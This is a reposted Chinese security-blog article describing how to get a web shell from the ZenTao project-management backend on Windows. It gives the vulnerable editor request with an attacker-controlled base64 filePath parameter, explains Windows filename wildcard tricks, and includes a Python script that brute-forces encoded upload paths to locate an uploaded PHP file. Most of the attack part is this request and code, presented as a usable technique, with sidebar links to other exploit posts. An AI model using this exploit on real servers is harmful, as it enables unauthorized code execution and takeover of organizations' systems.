禅道后台getshell（利用windows特性,快速确定文件名）

颓废

441
文章

0
评论

2019年5月19日09:15:35评论1,334 views字数 473阅读1分34秒阅读模式

摘要

开始

python生成字典(需自己构造):

本文作者baozi|学与用

window特性: 双引号(""") <==> 点号(".")'; 大于符号(">") <==> 问号("?")'; 小于符号("<") <==> 星号("*")';

开始

index.php ?m=editor &f=edit &filePath=YWFh &action=override &isExtends=

filepath参数可控，填写绝对路径+base64编码

python生成字典(需自己构造):

#!/usr/bin/env python # -*- coding: utf-8 -*- import base64,string  s="D:/ZenTaoPMS/xampp/zentao/www/data/upload/1/201707/3114144004131ln" s1="<<<<<<<<<<<<<<.php"  for word in string.lowercase:     print base64.b64encode(s+word+s1) for i in range(0,10):     print base64.b64encode(s+str(i)+s1)

之后便可找到文件位置:

本文作者baozi|学与用

左青龙
微信扫一扫

右白虎
微信扫一扫

本文由颓废发表于 2019年5月19日09:15:35
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
禅道后台getshell（利用windows特性,快速确定文件名）http://cn-sec.com/archives/68119.html

在线咨询

13688888888

8888 QQ在线咨询

微信
本页二维码

禅道后台getshell（利用windows特性,快速确定文件名）

linux sudo root 权限绕过漏洞(CVE-2019-14287)

vBulletin远程代码执行漏洞（CVE-2019-16759）

mintinstall 7.9.9-代码执行(CVE-2019-17080)

Webmin远程代码执行漏洞【CVE-2019-15107】

PDF窃取Windows NTLM哈希值

骚姿势之shell32.dll执行getpass

Windows Server 2019开启远程桌面

Weblogic反序列化远程代码执行漏洞exp(CVE-2019-2725)

CVE-2019-1064 AppXSVC本地权限提升漏洞分析及poc

metasploit创建反向shell并访问Windows 10系统环境

发表评论

在线咨询

微信